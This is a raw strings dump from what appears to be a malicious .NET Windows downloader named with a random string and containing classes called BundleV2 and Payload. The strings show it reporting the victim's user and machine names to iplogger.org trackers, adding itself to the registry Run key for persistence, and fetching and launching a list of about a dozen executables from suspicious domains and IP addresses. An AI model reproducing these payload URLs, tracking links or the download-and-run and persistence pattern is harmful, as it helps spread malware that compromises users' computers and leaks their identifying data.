!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
<Module>
DIqMUyT98Untp5QhexOCjQdS.exe
BundleV2
Bundle_V2
Payload
mscorlib
System
Object
System.Collections.Generic
List`1
payloads
runcount
fnGetFriendlyName
RegisterInStartup
Random
random
RandomString
length
System.Security.Permissions
SecurityPermissionAttribute
SecurityAction
System.Runtime.CompilerServices
CompilationRelaxationsAttribute
RuntimeCompatibilityAttribute
DIqMUyT98Untp5QhexOCjQdS
<>c__DisplayClass5
fileurl
<Main>b__1
<>c__DisplayClass8
payload
<Main>b__2
<Main>b__0
System.Threading
ThreadStart
CS$<>9__CachedAnonymousMethodDelegate3
CompilerGeneratedAttribute
Environment
SpecialFolder
GetFolderPath
String
Concat
System.Net
WebClient
DownloadString
DownloadData
System.IO
WriteAllBytes
System.Diagnostics
Process
WebHeaderCollection
get_Headers
get_UserName
get_MachineName
System.Collections.Specialized
NameValueCollection
Thread
Contains
Enumerator
GetEnumerator
get_Current
MoveNext
IDisposable
Dispose
System.Management
ManagementObject
<fnGetFriendlyName>b__a
Func`2
CS$<>9__CachedAnonymousMethodDelegateb
ManagementBaseObject
GetPropertyValue
ManagementObjectSearcher
ManagementObjectCollection
System.Core
System.Linq
Enumerable
IEnumerable`1
System.Collections
IEnumerable
OfType
Select
FirstOrDefault
ToString
Microsoft.Win32
Registry
RegistryKey
CurrentUser
OpenSubKey
SetValue
<RandomString>b__c
CS$<>9__CachedAnonymousMethodDelegated
get_Length
get_Chars
Repeat
ToArray
.cctor
System.Security
UnverifiableCodeAttribute
WrapNonExceptionThrows
System.Security.Permissions.SecurityPermissionAttribute, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
SkipVerification
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
https://pastebin.com/raw/mH2EJxkv
user-agent
referer
https://iplogger.org/1ixtu7
https://iplogger.org/1lA5k
Caption
SELECT Caption FROM Win32_OperatingSystem
Unknown
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789
http://103.124.106.203/cof4/inst.exe,http://aretywer.xyz/Corepad092.exe,http://jg3.3uag.pw/download.exe,https://msiamericas.com/wp-cache-data/msiamericas.exe,http://188.93.233.223/proxy1.exe,http://d0wnl0ads.online/chashepro2.exe,www.yzxjgr.com/askhelp28/askinstall28.exe,https://www.investinae.com/include/HWWKFile.exe,http://mytoolsprivacy.site/downloads/privacytools3.exe,http://file.ekkggr3.com/iuww/jvppp.exe,https://digitalassets.ams3.digitaloceanspaces.com/MultitimerR/MultitimerFive.exe,https://digitalassets.ams3.digitaloceanspaces.com/MultitimerR/MultitimerFive.exe
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
FileDescription
FileVersion
0.0.0.0
InternalName
DIqMUyT98Untp5QhexOCjQdS.exe
LegalCopyright
OriginalFilename
DIqMUyT98Untp5QhexOCjQdS.exe
ProductVersion
0.0.0.0
Assembly Version
0.0.0.0